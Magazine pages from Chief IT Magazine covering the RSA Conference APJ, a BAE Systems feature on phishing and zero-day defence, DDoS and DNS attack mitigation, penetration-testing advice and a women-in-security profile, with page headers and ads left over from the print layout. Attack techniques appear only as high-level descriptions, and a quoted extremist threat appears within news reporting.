he threat to cyber security is mounting even as the technology landscape transforms across the world, with some of those either within or outside the organisation manipulating the changing technologies to their advantage. The shift towards software-defined networks, cloud infrastructures and smartphones replete with apps has added complexity as systems appear increasingly vulnerable to web threats and frauds that are only increasing in number and sophistication. The profitability of cybercrime is transforming the nature of the game. And in its relentless quest to stay ahead of the fraudsters, cybercrime intelligence the world over is evolving ever newer tools to thwart the changing threat landscape of internet fraud and crime in an effort to safeguard official and personal data and information. Mindful of these challenges, Amit Yoran, the President of RSA, The Security Division of EMC Corporation, both headquartered in Massachusetts, has given a clarion call to adopt faster detection and response to end the “vicious cycle” of prevention and remediation. Addressing government and private industry cybersecurity experts in Singapore at the recent RSA Conference Asia Pacific & Japan (RSAC APJ), the RSA chief urged companies and governments to re-think their traditional approaches to cyber defence as they increasingly turn to mobile and cloud technologies to store and access data and systems. This third APJ edition of the annual RSA Conference,
T
the world’s leading information security symposium and exposition, elicited a record turnout of over 4,900 registrants, a 50 per cent increase from 2014, attending 60 track sessions, keynotes and tutorials featuring more than 90 speakers. The track sessions were split across the seven tracks of Cloud and Data Security, Cybercrime and Law Enforcement, Governance and Risk Management, Mobile Security, Security Infrastructure, Threats and Threat Actors, and Sponsor Special Topics. The Conference also saw more than 90 exhibitors and sponsors, an increase of 35 per cent over 2014. Participating companies included Cisco Systems, Australian Strategic Policy Institute (ASPI), Fortinet, Barracuda, MITRE, Certes Networks, Ernst & Young, Akamai and RSA that showcased the latest technologies designed to secure and protect organisations against cyber threats. The closing keynote address was delivered by Kailash Satyarthi, the Indian national who won the Nobel Peace Prize in 2014 for his children’s rights advocacy and activism. Yoran discussed how the rapid growth of mobile and cloud technologies presents a boon to organisations and industries, but also a significant threat to their legacy security operations. As mobile and cloud technologies decentralise organisations’ digital environments, the perimeter on which traditional cyber defences are based is disappearing. “Despite the disappearing perimeter, businesses around the world continue to rely primarily on perimeter protection
Cyber Security
technologies like firewalls, anti-virus, and intrusion detection systems to prevent breaches, only to see those tools invariably fail under the onslaught of today’s advanced attacks,” Yoran said. “Compounding that failure is the current practice of relying on SIEM and other signature-based tools that require historical experience to detect advanced threats, which oftentimes have no precedent.” He added that this combination of antiquated technologies and misguided practices is the root of the vast majority of today’s security failings. Yoran concluded by reminding the audience that the technologies already existed for companies to move to a more effective approach to security focused on faster detection and response to security threats. What was lacking was the will. “This is not a technology problem,” he said. “This is a mindset problem.” Citing nation-state attackers as the biggest challenge to internet security today, RSA’s Chief Technology Officer, Dr Zulfikar Ramzan, remarked, “The good news is that they are still relatively few.” Ramzan, who works out of Santa Clara, California, said that attackers were generally getting more sophisticated and what was considered a sophisticated attack five years ago was today viewed as a mainstream one. Enhancing preventing measures at times was no use, he said, because good adversaries would find ways around them. The issue was often not that a major breach had occurred, but to get to know the full scope of the breach and what happened from that point onward, he averred. The key to managing these incidents was getting knowledge of them in time so as to contain their impact, he added. He maintained that this was a problem area that more vendors were addressing, and more companies needed to think about. Indicating that most of the recent data breaches were compromises in legacy IT systems and not in cloud services, Ramzan maintained, “We need to get over the idea that cloud is somehow inherently insecure, for it may actually be more secure for your needs.” He pointed out, however, that though it was cheaper and more efficient for the cloud provider to secure the infrastructure for all the customers than for each individual company to handle security themselves, there still were issues cloud providers needed to improve. “They need to provide customers visibility and control for data governance, as well as to help understand compliance risk,” he said The departure from perimeter-defined security was a key theme at the RSA Conference and Munawar Hossain, director of product management for data centre security and content security at California-based networking solutions giant Cisco Systems, Inc., said that the state of data centre security had also evolved from the paradigm of a selfcontained operation with a well-defined perimeter. “The data centre has evolved in three distinct ways: the aspect of virtualisation, the dependence of the data centre on optimised resources, and the dependence on services not housed in the data centre,” he noted. Stephen Dane, Cisco’s Hong Kong-based managing director for Security for APJ and Greater China, mentioned that was no longer a matter of “if ” cyber attacks would happen, but “when” and “how”. “Security concerns everyone in a business environment, and is now a persistent business risk,” he noted. “Many companies are still underserved by point product solutions that lack continuous advanced threat
This third APJ edition of the annual RSA Conference, the world’s leading information security symposium and exposition, elicited a record turnout of over 4,900 registrants, a 50 per cent increase from 2014, attending 60 track sessions, keynotes and tutorials featuring more than 90 speakers. protection and it is not unusual to find organisations with 40 or more different security solutions that don’t and can’t work together.” Attackers were taking advantage of the gaps in visibility and protection. According to him, not only did security need to evolve to meet new demands, but a new approach to security was also required. Dr Tobias Feakin, Senior Analyst, National Security, and Director, International Cyber Policy Centre, at the Australian Strategic Policy Institute (ASPI), based in Barton in the Australian Capital Territory, explored the concept of cyber-maturity, noting that Asia-Pacific countries had
Chief IT Magazine | 19
Cyber Security
“Smart cities represent the risks posed by the Internet of Things on a large scale, as the attack surface is huge and complex” different levels of security understanding and readiness. “The Asia-Pacific region was home to some of the ‘least networked’ as well as the ‘most networked’ countries,” he remarked. “Australia has a more mature conversation around national security threats, for example.” Web-based fraud is a growing problem in Asia-Pacific. IBM Security’s George Tubin described how the Dyre malware family combined phishing and malware to steal login credentials for online banking systems and then initiated wire transfers for large amounts of money. His colleague, Tal Darsan, gave details about Tsukuba, a banking Trojan which specifically targeted Japanese Facebook users and customers of 20 Japanese financial institutions. Organisations should quantify and prioritise risks associated with customer Web sessions and transactions, the speakers said. Feakin discussed how organisations could apply cybermaturity concepts, such as looking at how growth in the digital economy in the Asia-Pacific affected potential growth, and identifying risks. “When making policy decisions, look beyond your usual horizons and try and assess how they will be affected by political trends, legislation, and societal considerations,” he recommended. Referring to a spike over the past five months in offensive cyber activities by groups claiming association with the Islamic State, or ISIS, Feakin indicated that the Twitter and YouTube accounts of the United States Central Command (CENTCOM) - a theatre-level Unified Combatant Command responsible for US security interests in 20 nations, stretching through the Arabian Gulf into Central Asia - were suspended in January after CyberCaliphate, a group claiming to support ISIS, had hacked into both, defacing them with pro-ISIS messages. “While the hacks had no direct impact on CENTCOM’s operations, they were certainly embarrassing and akin to acts of ‘hacktivism’ we’ve seen from groups like Anonymous,” he mentioned. “In February, the same group hacked into Newsweek and, of all things, Taylor Swift’s Twitter account, defacing both with pro-ISIS messages and sending threatening messages to US President Barack Obama.” In March, a group claiming to be the IS Hacking Division published on JustPaste.it a list of photos, names, addresses and branch of US service personnel, which it claimed was taken from US military data servers. Accompanying the data was a statement from the group: “With the huge amount of data we have from various different servers and databases, we have decided to leak 100 addresses so that our brothers in America can deal with you…kill them in their own lands, behead them in their own homes, stab them to death as they walk their streets thinking that they are safe.”
20 | Chief IT Magazine
The most significant effort was in April when the French channel, TV5Monde, experienced a complete three-hour blackout and all its 11 channels, along with its website and social media outlets, were hacked into. While the attack was on, the hackers placed documents on TV5Monde’s Facebook page that they claimed were identity cards and CVs of relatives of French soldiers involved in fighting ISIS, accompanied by threats against the troops themselves. The IS Hacking Division again claimed responsibility. “What this attack illustrated was the group’s increased degree of sophistication,” noted Feakin. “There had clearly been an amount of pre-attack planning, including a degree of social engineering, that had gone on in order to completely shut down the station’s computer systems.” Dr Irving Lachow, Principal Cyber Security Engineer, with MITRE Corp., in McLean, Virginia, pointed out that the trend towards smart cities across the world was giving rise to a new set of security concerns. The idea of smart cities was gaining a lot of traction in the Asia-Pacific, with the Digital India campaign and Singapore’s Smart Nation initiative as notable examples. In this regard, governments were building out information technology and communications infrastructure to effectively and efficiently deliver services such as governance, education, healthcare, housing, and mobility to their peoples. “Smart cities represent the risks posed by the Internet of Things on a large scale, as the attack surface is huge and complex,” he observed, adding that cyber-criminals could target traffic control sensors, telecommunications, financial services, water supply systems, electricity grids, and the varied databanks. MITRE is a not-for-profit organisation that operates research and development centres sponsored by the federal government. Lachow, who had been the principal adviser to former US Defence Secretary Robert Butler, said the elements needed to build digitally secure and safe cities included a comprehensive privacy policy, increased awareness of citizens to digital threats, deployment of security technologies and dedicated cybersecurity teams, and effective public-private partnerships. Despite the high levels of interest, smart nations and smart cities were still in early stages. Yoran mentioned that while the cyber security industry does not have all the answers and still faces resource challenges, skill gaps and legal constraints, it was on the path to changing a paradigm under which it has operated for decades. “As an industry, we are on a journey that will continue to evolve in the years to come through the efforts of all of us,” he said.
ENTERPRISE AGILITY OBTAIN COLLECTIVE INTELLIGENCE AT THE FSI LEADERS SUMMIT
JOIN US IN SYDNEY How is your organisation adapting to digital; what is your mobile strategy? The FSI Leaders Summit will influence discussion around enterprise agility in today’s constantly evolving workplace within the financial sector. The Summit is invitation only and intended for Australia’s most senior Financial
leaders including CIOs, CTOs,
Heads of Technology, SVPs and many more to gather for a strategic two day event in order to exchange knowledge and interact as one over a range of important issues facing the industry.
SEPTEMBER 16 - 17, ANZ STADIUM, SYDNEY WWW.FSILEADERS.COM
FURTHER SUMMIT TOPICS INCLUDE
CYBER SECURITY
DIGITAL
MOBILITY
BIG DATA
ANALYTICS
For more information contact Tyron McGurgan e. tyron@mediacorpinternational.com.au
STORGAE
PAYMENTS
www.mediacorpinternational.com.au p. 02 8188 8508
Chief IT Magazine | 21
BAE Systems Applied Intelligence Feature
The changing threat landscape: the rise of the Zero-Day attack and how to prevent them New data breaches are uncovered almost daily – any one of which can jeopardise your company, place your intellectual property at risk, and cause monetary and reputational damage in minutes. Cyber criminals are increasingly aggressive, well-funded and persistent, and these days, no company can ever be perfectly safe from the most determined attackers. As the threat landscape continues to evolve, and malware detection becomes more advanced, cyber criminals are forced to create ever more sophisticated and specialised malware. As traditional signature based anti-virus scanners evolved into traditional signaturebased and heuristic-based malware scanners, the amount of spam and viruses caught with signature alone has reduced, but the amount of total malware has increased. In 2005, seven ‘families’ represented 70 per cent of all malware activity , and the types of viruses were mainly mass-mailing ‘worms’ with backdoor capability, including for example Nigerian email scams. In 2014, 20 ‘families’ represented 70 per cent of all malware activity ; with today’s malware much more sophisticated and unique, including for example stealthy command-andcontrol botnet membership, credential theft, and often also including some form of fraud such as bitcoin mining. And now, with 70 to 90 per cent of malware unique to any single organisation , the most difficult attacks to defend against are Zero Day attacks – attacks that are unknown or have not previously been seen and therefore cannot be recognised and blocked by their ‘signature’. Email is the single most important entry point for malware insertion, as it is the centrepiece of business communications and is the most common egress and ingress point for information within most companies. It is also the single most important entry point for targeted attacks, spear phishing, ‘longline’ phishing, and advanced zero day exploits.
In fact, 95 per cent of cyber attacks start with an email message . ‘Phishing’ campaigns mostly target Common Vulnerabilities & Exposures (CVEs). These attacks can spread through an organisation like wildfire, with 75 per cent of attacks spreading from victim 0 to victim 1 within 24 hours, and 40 per cent of attacks hitting a second organisation in less than one hour .
•
The challenge
Post-exploitation: Interrupting the command and control and actions on objectives phases
As malware evolves, traditional anti-virus software is struggling to cope. For example, sophisticated malware can now recognise when it is being ‘sandboxed’ by looking for files associated with the sandbox environment. Companies need a strategy that reduces their security exposure and protects them from reputational damage and intellectual property theft from cyber threats with fast and effective attack detection, containment, and response.
The technology solution Companies need a strategic systems approach to protect against today’s evolving cyber threats. A systems approach requires multiple layers of technology that help protect an enterprise at every phase in the Kill Chain. These components work together as cooperative, compensating controls to interrupt attackers as they attempt to move from one phase to the next. These technologies are appropriate before an attack succeeds (pre-exploitation) and afterwards (post-exploitation).
Pre-exploitation: Interrupting the delivery phase •
Email security: Strong, redundant anti-virus and anti-spam engines, with controls to throttle high-volume senders and detect directory brute-forcing
•
Web security: Inline web security filters to prevent visits to sites that are known to or likely host malware used in attack campaigns Zero Day Prevention: Heuristics, analytics and sandboxing to stop targeted attacks, spear phishing, “longline” phishing, and advanced Zero Day exploits that anti-virus and anti-spam controls can’t detect.
•
IDS/IPS: Monitoring and analysis of complex network traffic in real-time; blocking of malicious internal traffic and sophisticated attacks that cannot be prevented with firewalls alone • Security information and event management (SIEM): 24 x 7 monitoring of critical devices on the network by a trained security team. Log management: Regular reviews of security logs from critical devices to understand security events across the network, detect suspicious activity and respond quickly to prevent malicious attacks • Insider Threat prevention: Content aware policy filters to ensure that sensitive and protected information stay inside the organization - where they belong. A systems approach connects the dots and those connections ensure that information gets in the hands of those who need it as quickly as possible - whether it’s a system component or a human being.
The people solution The most insecure parts of any security infrastructure are the living, breathing human beings tapping on keyboards. Intentionally or not, we all make mistakes now and then. Phishing emails can masquerade as friends,
PROTECT AGAINST ONLINE QUOTE MANIPULATION How can Insurers address attempted fraud and dishonest manipulation at point of quote, while minimising friction for genuine customers?
Engage with
For more information visit www.baesystems.com/ai
22 | Chief IT Magazine
www.baesystems.com/ai
BAE Systems Applied Intelligence Feature
or as a popular retailer or businesses. Phishing emails cloak their origins by using masked URLs that only show the true URL if you hover your mouse over it. Ultimately, phishing emails are designed to induce recipients to ‘click’ and visit malicious destinations controlled by the attackers. Phishing emails are hard to stop unless recipients are vigilant. While there are numerous tipoffs a user can employ to detect a phishing scam, employees must be trained to recognise them.
How to spot a ‘phish’ It’s not always straightforward, but there are a few steps employees can take to avoid being drawn in by a phish. 1. Looking for misspelled words and lousy grammar: Hackers are notoriously bad spellers. Some marketers are too, so it’s not always the case that that a typo-laden email is a phish, but it’s a good tipoff 2. Looking before they click: Before clicking, hover over a link to make sure it goes to the site you think it does. Often, a phishing email will spoof the URL of a well-known brand - or just camouflage a nasty IP address under that URL 3. Only opening the familiar: If employees receive emails from people they don’t know, or offers from companies they never subscribed to, they shouldn’t open them. And if you do open them, don’t click any links 4. Paying attention to ‘link bait’: Attackers want victims to click on their links and will exploit every human failing to get them to do it. The more strongly an email appeals to employees’ curiosity, charity, urgency, prurience or vanity, the more likely it is to be a phishing attack.
Protecting against zero day attacks
techniques that analyse unknown objects with malware engines while applying advanced techniques to detect and prevent attacks, even without signatures. 1. Stops sophisticated threats, including Zero Day Attacks and Advanced Persistent Threats 2. Arms CIOs and IT managers with new, comprehensive detection techniques to reduce their company’s attack surface and vulnerabilities 3. Provides protection at the time of click through real-time detect and block capabilities by rewriting URLs 4. Uses ‘in-line’ inspection and prevention techniques to stop payloads before delivery 5. Inspects all known and emerging malware contained in messages, headers, metadata, links, and all potentially malicious attachment types and returns minimal false positives 6. Provides a holistic view of incoming threats, so it can be rapidly assessed, evaluated and acted on by human analysts. If one component detects something, it alerts the other components. Putting everything under the same watchful eyes protects assets and helps a company understand the risks more acutely 7. Addresses the entire ‘kill chain’ by providing companies the support and intelligence they need, when they need it Cyber security is no longer just about keeping the lights on – businesses need to protect their corporate IP, their reputation, and keep the trust of customers, investors and the public. By developing a partnership with their supplier and combining that with ongoing training of staff, companies can increase their understanding of the threat landscape, and where they can’t prevent each and every attack from happening, they can increase their chances of dealing quickly and effectively with an attack, thereby minimising detrimental outcomes.
BAE Systems’ Zero Day Prevention leverages leading-edge statistical analysis techniques, static and dynamic analysis, machine learning and innovative exploit detection sandbox
Anatomy of a phishing attack So what are the stages of a ‘phishing’ attack and how does it work? 1. Spear-phish email with link Compromised enterprise servers are used to send the emails. This has the advantage of by-passing reputationbased spam detection filters as well as tricking the recipient with a recognisable sender domain. 2. Malware delivery The email asks the victim to click a link. These links send the recipients to compromised websites hosting zip files containing the malware payload. 3. Malware ‘Command and Control’ (HTTPS) Once the payload is downloaded and executed, the malware communicates over HTTPS to a compromised server hosting a PHP script which provides a gateway to a custom task/log database file. 4. Victim information and tasking The attackers access the Command and Control (C&C) server through the same gateway script. They can then retrieve logs of victims connecting back to the server, and add tasks which the malware retrieves. This can include general tasks like password stealing or taking screenshots, but also arbitrary commands and scripts to execute. 5. Document exfiltration The attackers will then extract the documentation from its location. Often, they make use of cloud storage service OneDrive (part of Microsoft’s Live service). The VBS script adds OneDrive as a mounted drive, moves the stolen documents there (where they are synchronised with the cloud), and then un-mounts the drive. 6. Document retrieval Using OneDrive is beneficial as it is free and anonymous for the attacker to setup, but also unlikely to be blocked from enterprise networks and has encryption by default. Once the stolen documents are synced with OneDrive, the attackers can log in and quickly retrieve the stolen data through an anonymous internet service such as TOR.
Sanjay Samuel General Manager APAC, BAE Systems Applied Intelligence
WHITE PAPER - THE DATA LAKE - READY TO TAKE THE PLUNGE? We live in a time of uncertainty for the traditional Enterprise Data Warehouse (EDW).
www.baesystems.com/ai
WHITE PAPER - 5 STEPS TO IMPROVED OPERATIONAL SECURITY In the modern world, for many of us working to tackle cyber crime, the goal of building effective operational security is not only to be able to identify, investigate and re-mediate cyber attacks and crimes conducted in cyber space which impact on the real world, but to prevent such attacks from occurring in the first place.
Chief IT Magazine | 23
Cyber Security National
The best ways to fend off DDoS attacks By Martin Ryan
24 | Chief IT Magazine
W
hen Australia’s largest wireless broadband provider Cirrus Communications suffered a distributed denial of service (DDoS) attack in July 2014, the attack had hit Cirrus’ core network, rather than the radio equipment on the edge, knocking out half of its network. Following the incident, the broadband provider admitted that it had experienced “struggles” in the wake of the event, and further reports suggested that the attack had disrupted communications to other carriers that use Cirrus’ services. It would be naïve to think that DDoS attacks are rare. In fact, many reports indicate the opposite. According to BT Global Services, 64% of Australian organisations were hit by DDoS attacks in 2014, which was the highest out of all 11 geographical areas measured in the report. Not only are DDoS attacks common, the ones seen in Australia are shorter and more aggressive. According to ARBOR Networks the attack length in Australia during the first quarter of 2015 was 22 minutes, versus 46 minutes in Asia Pacific (APAC). The average DDoS attack was 1.25 Gbps, compared with the APAC average of 483.65 Mbps—a dip from the last quarter of 2014 where the average DDoS attack in Australia was 1.34 Gbps and the average APAC attack size was 500.68 Mbps. Considering the statistics, organisations should already have a solid plan in place to counteract such attacks, but in reality, only 24% of Australian organisations said that they
have sufficient resources in place to counteract a DDoS attack, according to the same BT Global Services report.
It Pays to be Prepared Due to the growing ease of launching DDoS attacks, the demand for DDoS prevention solutions is also on the rise. IDC has forecast that the worldwide market for DDoS prevention solutions will grow by a compound annual growth rate (CAGR) of 18.2% from 2012 through 2017 and reach $870 million. DDoS attacks are not only obnoxious to deal with, but they can be a great detriment to your company. Companies that have undergone DDoS attacks have experienced the following: Loss of income: For ecommerce giants, just a second of downtime could mean thousands in lost revenue. Even if your company isn’t as large as Amazon or eBay, any amount of profit loss due to downtime should be cause for concern. Not only do you miss a potential sale in real time, that customer is less likely to come back and try to purchase from you again in the future. A recent study by Kaspersky Lab and B2B International estimated that a DDoS attack on an organisation’s online resources might cause losses ranging from $52,000 to $444,000.
National
Brand damage: If potential customers are trying to reach your website and are greeted with an error message, they probably will not immediately assume that the site is under a DDoS attack. They will most likely assume that there is something wrong with the development of the website itself and may feel that it is unreliable, making them less likely to return. Press surrounding DDoS attacks can also paint a bad picture for your brand. If the driving force behind the attack was based on political or moral agendas, your brand could acquire a negative image because it was one of the attacker’s targets. Loss of customer confidence: Just as your brand image may deteriorate in the public eye, your customers may also lose confidence in your organisation. If you have a web servicebased company (think web hosts) and if your servers go down due to an attack, all of your customers’ websites go down as well. It can take only a few moments of downtime a year to provoke a customer to move to another service provider. Personnel cost: The time spent by your personnel to investigate and mitigate an attack can be costly. Time spent by your operations team dealing with an attack only takes away from their regular work. Similarly, your helpdesk will also see an influx of calls and tickets due to questions surrounding access during downtime. All of these extra hours can massively add up over the duration of an attack.
Reducing The Threat of DNS-based DDoS Attacks Domain Name System (DNS) based DDoS is a common network traffic attack used by malicious attackers to impact business operations and critical IT applications. The attacks are designed to bring down DNS servers and consume network bandwidth, thereby impacting critical IT applications. There are three ways such attacks can happen, and three common techniques used to redirect traffic through compromised DNS servers: •
•
•
for typically 86,400 seconds, or a full day. Solution: Unless operators are able to purge caches, it can take an entire day (sometimes longer) for the effects to be reversed.
The Way Forward The best way to avoid any disruption from a DDoS attack is to be prepared for it. Talk to your DNS provider and ask about their mitigation techniques, and if you are currently doing everything in-house or are relying on your ISP or a firewall, evaluate your situation. Do you feel confident that what you have in place can successfully mitigate an attack? If you are having a hard time deciding whether or not you actually need to invest in a stronger mitigation technique, figure out the impact it would have on your company financially if it were to happen. Although it may not be an apparent risk, the cost associated with being attacked is usually much higher than the cost to take safeguards. If you are not prepared, then you might have to be prepared to pay for it—significantly. About the Author Martin Ryan is the VP Managing Director Asia Pacific at Dyn. He is responsible for leading Dyn’s business strategy in the region as well as increasing the company’s market penetration. Martin holds a postgraduate MBA from the Macquarie University Graduate School of Management and a Bachelor of Electronic Engineering and Bachelor of Business from the University of Technology Sydney.
The first is to perform a cache poisoning attack. Basically, attackers attempt to inject malicious DNS data into the recursive DNS servers that are operated by many ISPs. These DNS servers are typically the “closest” to users from a network topology perspective, so the damage is localised to specific users connecting to those servers. Solution: There are effective workarounds to make this impractical in the wild, and good standards like Domain Name System Security Extensions (DNSSEC) that provide additional protection from this type of attack. The second method is to take over one or more authoritative DNS servers for a domain, and change the DNS data. If an attacker were to compromise authoritative DNS, the effect would be global. Solution: Good security practices like strong passwords, two‐factor authentication, IP Access Control Lists (ACLs), and good social engineering training are effective at thwarting these attacks. The third technique can be the most difficult to undo. The attacker takes over the registration of a domain and changes the authoritative DNS servers. What makes this attack so dangerous is the Time To Live (TTL). Changes of this nature are globally cached on recursive DNS servers
Chief IT Magazine | 25
EX E C U TIV E B O ARD RO O M LUNCHEON INVITATION
EXCLUSIVE TO COLLEAGUES
CIO, CISO & CSO THURSDAY 8TH OCTOBER 2015 12.15 PM - 2.15 PM
1 EAGLE STREET, EAGLE STREET PIER BRISBANE, QLD 4000
Security as an enabler for cloud computing James Turner Senior Advisor IBRS
As an IT leader, you understand the potential advantages and benefits that cloud computing could bring to your business. It can enable you to innovate and accelerate business, enhance customer experience, provide employee workplace mobility and increase efficiency. You are also aware that protecting your organisation’s technology assets is one of the biggest challenges in embracing cloud. How can you ensure your cloud environment has rigid security in place be it in public, private or hybrid consumption models? Join James Turner, Senior Advisor, IBRS as he facilitates a discussion on security-business alignment challenges in the mobile cloud era and the safeguards you can put in place to protect your data and applications.
Subject matter experts, Armando Dacal, Regional Vice President, Palo Alto Networks, and Arthur Iliakopoulos, Southern Region Manager, Network and Security, VMware, will also be attending. In this invitation-only executive lunch session, held under Chatham House Rule, we invite you to join your peers in a frank discussion on the challenges and best practices of the journey to cloud. I will be calling you in the next few days to confirm your attendance. Regards,
Chris Cubbage
Director & Executive Editor Australian Security Magazine & ChiefIT Magazine
Kindly RSVP by 6th October to ccubbage@mysecurity.com.au or 0432 743 261
PROUDLY ORGANISED BY
Drones Robotics Automation Security Technology Information Communications
www.drasticnews.com Like us on facebook! www.facebook.com/drasticnews
Technology Cyber Security Focus - CCTV
The power of penetration testing in boosting cyber resilience
I By Dave Jarvis National Practice Lead, UXC Saltbush
t seems that every week there is another zero day exploit doing the rounds. Software patching and updates are becoming increasingly frequent, and the rise of mobility is further weakening the business world’s cyber attack surface. Traditional defences can no longer provide the protection needed. Organisations need to become resilient to adapt to these new and emerging threats. Cyber security resilience involves more than just the prevention or response to a specific attack. It also takes into account the ability to operate during, and to adapt or recover, from such an event. This goal requires cyber risk management, and not one, but many cyber security measures. Traditionally, companies have focused on protection against specific cyber attacks. In today’s digital environment, however, a resilience-based approach to threats is more effective for organisations wanting to adapt to change, reduce exposure to risk, and learn from incidents when they occur. Due to the growing interconnectedness that comes with new and emerging business technology, improving the resilience of one organisation can be a small step in improving the cyber resilience of all. The same goes for the disparate departments and operations within a single business. Once a unified, company-wide approach to security is established, there will be fewer points of vulnerability to exploit. According to CERT Australia, the government’s national computer emergency response team, modern organisations must layer security defences for their IT systems to reduce the chance of a successful cyber attack.* * Australian Cyber Crime & Security Survey Report, CERT, 2013.
28 | Chief IT Magazine
While the installation of traditional security software, including a firewall, anti-virus, and anti-spyware remains an essential first step to cyber security, these safeguards alone are no longer enough to adequately protect an organisation from potential threats. Instead, businesses should manage risk with multiple defensive strategies, so that if one layer of defence turns out to be inadequate, another layer can step in to help prevent a full breach. This is known as ‘defence-in-depth’. The multiple defence mechanisms layered across an organisation’s network infrastructure can protect data, networks, and users. A well-designed and implemented defence-in-depth strategy can help system administrators identify internal and external attacks on a computer system or network. Building organisational resilience to cyber security incidents also requires constant awareness and action. For an organisation to be prepared before an incident occurs, cyber security needs to be part of its risk management, resilience structures, and planning, and staff need to be trained to use good cyber security practices as part of their daily work. Steps on the path cyber resilience There are many ways to protect an organisation’s networks and confidential data at multiple levels. For starters, businesses should make sure they keep their software patches up-to-date and use versions of software that are still supported by such updates. This should include all operating systems and applications, as well as email, database, and
Cyber Security
web servers. Make sure systems are configured to update automatically where possible. Given today’s regulatory regime around handling sensitive or private customer information, it is vital that companies develop a backup strategy for critical or sensitive data. A good strategy includes daily backups, an additional weekly or monthly backup, with both offline copies as well as offsite storage of at least the weekly backup media. Companies should make sure to test that they can recover with backup data. A sound backup strategy will ensure access to information in the event of a cyber security incident. Having an offline backup also reduces the impact of ransomware attacks. Sometimes the simplest solutions can often be overlooked, yet taking the basic step of creating nonadministrator level accounts can do a great deal to help guard against the threat of a security breach. New computers usually have, by default, a single user account with administrator privileges. Split this into two, and the opportunity for an attacker to gain control of a system can be reduced. Use the non-administrator account for all day-to-day activities, in particular for accessing email and web browsing. The retention of network and computer event logs has become best practice for most industries in which IT plays a vital role. The reason for this is that it can help organisations better detect malicious activity. This is important, as it is still the case that most security breaches go unreported simply because they remain undetected. Implementing sound logging practices improves the chance that malicious behaviour will be detected by highlighting any changes to the normal behaviour of a network, system or user. Logs can show how a cyber security incident came to pass and, therefore, what can be done to prevent similar occurrences in the future. With mobile devices playing such a large part in business technology, it is important to keep in mind that users with remote access can be targeted by attackers to attempt to gain unauthorised access to an internal network. Organisations should have systems in place that can ensure any remote access services are secure. This might involve disabling remote access if it is not needed, or using strong passwords if remote access is required. It is also important secure all other public-facing services, like a web server, through independent website penetration testing for vulnerabilities. The importance of penetration testing Another vital element in establishing cyber security resilience is regular penetration (or ‘pen’) testing. Without pen testing, there is no way of knowing how protected a company is from known threats in the wild. Undergoing pen testing for IT security defences can sometimes be a bit like going on a first date: those involved are a bit nervous that the results might be embarrassing and everyone will find out about it. Nevertheless, pen tests are an essential element of any information security risk assessment. They can provide proof of potential vulnerabilities and help deliver actionable information to support executive decision-making and priorities for investment. It is important to be honest and
open about systems and processes when it comes to pen testing, even if this seems counter-intuitive to the natural reaction of self-preservation and protection. Before embarking on a pen test, here are five tips for getting true value from a pen test engagement: 1) Be careful in defining scope How much should be divulged on a first date? Unless the objectives from a pen test have been carefully considered and defined, it is likely to drift into areas that are not necessarily where the organisation wants it drift. Two key questions to ask and answer truthfully, are: “What are our security objectives?” and “What outcomes are we looking for?” 2) Create rules and manage expectations A pen test engagement will likely involve limited time, tools, and resources. However, most determined hackers can mount a sustained offensive using multiple tools and exploits over a long period of time. As such, it is important to remember that a pen test is a point-in-time activity, so treat it accordingly. While pen testing is not a public spectacle for uploading to YouTube, make sure that relevant third parties, such as hosting providers, are managed so they can brought in on the act as well. This will help with greater overall insight. 3) Put pen testing into proper context Given the time restrictions that pen testing is often subject to, different testers can potentially deliver varied results, depending on the different tools and tactics they deploy. Despite this necessary limitation, pen testing is crucial within any risk framework with the prerequisite of a robust information security framework. Don’t analyse it in isolation; it’s a one off event just like a date, not a silver bullet or ticket to the altar. 4) Go for quality Generic self-testing and self-assessment has its place if the risk profile is low enough. However, doing it all alone is no substitute for the real thing. To get value for money, take the precaution of selecting a reputable company with respected accreditations. One approach could be to look for the internationally recognised CREST stamp of approval, which is hard to achieve. It also assures that individual pen test operatives have the necessary skills, and that their employing company has appropriate quality assurance procedures to avoid any slip-ups. 5) Get executive buy-in upfront Get approval early on. Executives must fully understand the reasons for the exercise and its potential consequences. Too many organisations budget for a pen test and not its outcomes. However, a ‘test and forget’ approach is not a mature option. Paying lip-service by just having regular pen tests is not an inoculation against real attacks. While it may not be possible to fill all potential gaps, accept that some remediation may be required to satisfy a risk profile. Get commitment upfront from management that a treatment plan will be actioned.
Chief IT Magazine | 29
Women in Security Cyber Security
‘But you are a woman’
T By Kema (Johnson) Rajandran Correspondent
30 | Chief IT Magazine
o some, being in financial crime may seem like an area where you’re deskbound, staring at a computer screen and crunching numbers, but to Michelle Weatherhead, the variety couldn’t be more interesting. As BAE Systems Applied Intelligence head of financial crime ANZ, Michelle manages eight consultants and works primarily with financial institutions across the Asia Pacific. Her role takes her from Australia to Singapore, Malaysia, Indonesia, Thailand or the Philippines at any given time. She says the appeal of working with BAE Systems Applied Intelligence is the ability to work with military grade technology; cutting edge and sophisticated solutions to combat a variety of problems in security – from cyber and fraud to terrorist financing. “We help our clients detect fraud, comply with AML legislation and combat cyber crime through data, software solutions and professional services,” Michelle says. “I really enjoy the variety of the work. One week, I am doing a presentation in Manila for one-hundred employees and the next week I am working with a client in Singapore helping them to solve a complex and high profile financial crime problem,” she says. With an abundance of highlights to date, Michelle says she’s been very fortunate in her career so far and shares some memorable and noteworthy parts with us. “In July, BAE Systems Applied Intelligence hosted a women in cyber security and financial crime networking
event. Twenty women from a variety of roles across the industry attended and it generated a lot of positive conversations.” “As a networking evening, we placed an emphasis not on technical learning but on essential career and development skills and shared discussion. It demonstrated what the impact is of a positive mindset and the importance of networking.” Michelle shared a very personal story at this event about working as a woman in this industry and the difficulties she encountered. “Over the past ten years, I have worked in many countries and it hasn’t always been easy being a woman in this industry.” “Prior to working at BAE Systems Applied Intelligence, I was sent to on a financial crime consulting engagement in the Middle East. When I turned up, the head of IT looked at me and said: “I thought you were Michael, but you are a woman!” “Being a little naïve, my innocent response was: “Yes I am Michelle and I am a woman, but I am the best consultant to write your detection rules. Do you want the best consultant to solve your fraud problem or would you like to wait for Michael?” “He waited for Michael, his loss of course…” Ouch. “That was ten years ago and many things are different
Women in Security
“Criminals collaborate; share what they are doing and what works on the dark web. They work together to conduct the crime, so we must do the same thing to combat it.”
